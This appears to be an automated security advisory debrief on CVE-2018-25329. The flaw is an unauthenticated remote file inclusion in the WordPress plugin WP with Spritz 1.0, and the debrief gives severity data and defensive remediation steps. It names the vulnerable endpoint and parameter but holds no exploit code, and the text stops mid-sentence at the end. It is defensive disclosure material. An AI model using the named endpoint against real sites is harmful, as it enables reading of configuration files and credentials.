PatchSiren cyber security CVE debrief
CVE-2018-25329 Unknown Vendor CVE debrief
CVE-2018-25329 describes an unauthenticated remote file inclusion issue in the WordPress plugin WP with Spritz 1.0. The reported impact is arbitrary file access by injecting a file path into the url parameter sent to wp.spritz.content.filter.php, which can expose configuration data and credentials. The record is rated HIGH severity in the supplied corpus (CVSS 8.7).
- Vendor
- Unknown Vendor
- Product
- Unknown
- CVSS
- HIGH 8.7
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-17
- Original CVE updated
- 2026-05-18
- Advisory published
- 2026-05-17
- Advisory updated
- 2026-05-18
Who should care
Site owners, WordPress administrators, managed hosting teams, and responders who operate or support installations that may include the WP with Spritz plugin. Security teams should treat this as especially important on internet-facing WordPress instances or any environment where plugin access is not tightly controlled.
Technical summary
The supplied description says the vulnerable code path accepts attacker-controlled file locations through the url parameter and can be reached without authentication via GET requests to wp.spritz.content.filter.php. That behavior aligns with CWE-98 (improper control of a filename for include/require) and can result in remote file inclusion or local file disclosure. The NVD record in the corpus marks the issue as network-reachable, unauthenticated, and high-confidentiality impact, with no integrity or availability impact asserted in the provided CVSS vector.
Defensive priority
High; urgent if WP with Spritz 1.0 is installed, reachable, or was previously exposed.
Recommended defensive actions
- Identify whether WP with Spritz is installed anywhere in your WordPress estate, including archived, staging, and customer-managed sites.
- Remove or disable WP with Spritz 1.0 immediately; if the plugin is no longer maintained, plan replacement rather than continued use.
- Inspect web logs and application telemetry for requests to wp.spritz.content.filter.php and unusual url parameter values.
- Assume sensitive files may have been exposed if the plugin was reachable; review for leaked configuration, secrets, and credential reuse.
- Rotate credentials and keys that may have been present in exposed WordPress or server configuration files.
- Apply compensating controls such as restricting access to the affected endpoint until removal is completed.
Evidence notes
The corpus ties this CVE to WP with Spritz 1.0 and states that unauthenticated GET requests to wp.spritz.content.filter.php with malicious url values can be used to read arbitrary files. NVD metadata in the corpus lists CWE-98 and a CVSS 4.0 vector with network attack vector, no privileges, no user interaction, and high confidentiality impact. The vendor identity is low-confidence in the supplied data, so the safest framing is to describe the affected product as the WordPress plugin WP with Spritz rather than asserting a stronger vendor attribution. The dates provided in this corpus are record publication/modification timestamps and should be treated as disclosure-record timing, not as the original exploit discovery date.
Official resources
This debrief is based only on the supplied corpus and official links. The corpus dates reflect the vulnerability record's published/modified timestamps, not the original vulnerability discovery date. No exploit code or reproduction stepsare